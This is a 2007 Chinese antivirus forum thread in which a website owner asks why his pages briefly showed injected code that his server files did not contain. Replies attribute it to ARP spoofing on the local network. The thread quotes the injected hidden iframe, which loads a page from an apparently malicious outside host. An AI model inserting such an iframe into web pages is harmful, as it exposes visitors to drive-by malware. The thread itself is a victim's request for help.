瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 加急!服务器被挂马,所有文件却没有改动...

1   1  /  1  页   跳转

加急!服务器被挂马,所有文件却没有改动...

加急!服务器被挂马,所有文件却没有改动...

刚才,突然发现,网站上所有页面,HTML,ASP,访问时,网页源代码最上面有一个木马代码:如下:
<iframe src=http://123s123.cn/admin/95.htm width=20 height=0 frameborder=0></iframe>
后面跟着一些NULL字样的黑框乱码
瑞星最新版(今天)没有报警,进FTP检查所有页面生成日期,及所有HTML源码,没有发现上面代码
再次访问,所有页面正常,至此,所有页面日期没有被改动,
我记下了这个木马的站长统计地址:http://www.cnzz.com/stat/login.php?web_id=686502

请高手分析,这是怎么回事?为什么被挂马,被没有修改HTML,ASP?

[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
最后编辑2007-11-14 14:38:34
分享到:
gototop
 

1,能确定,我访问自己站的时候,网页确实有此代码,但从FTP里拉下来这个THML页,找不到代码
2,能确定HTML和ASP文件,文件日期都对
3,能确定访问我的站有此代码时,访问其他站的任何网页没有此代码
4,我访问有此代码时,我让外地的朋友访问此页面,结果他那边显示一切正常。。。
5,能确定我的站有此代码时,在同一服务器上的另一个站,没有问题
请高手分析。。。。
gototop
 

我的一个朋友帮忙检查了,确定是内网ARP欺骗攻击
所有页面被加了<iframe...
gototop
 

瑞星怎么没有专防ARP的工具。。。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT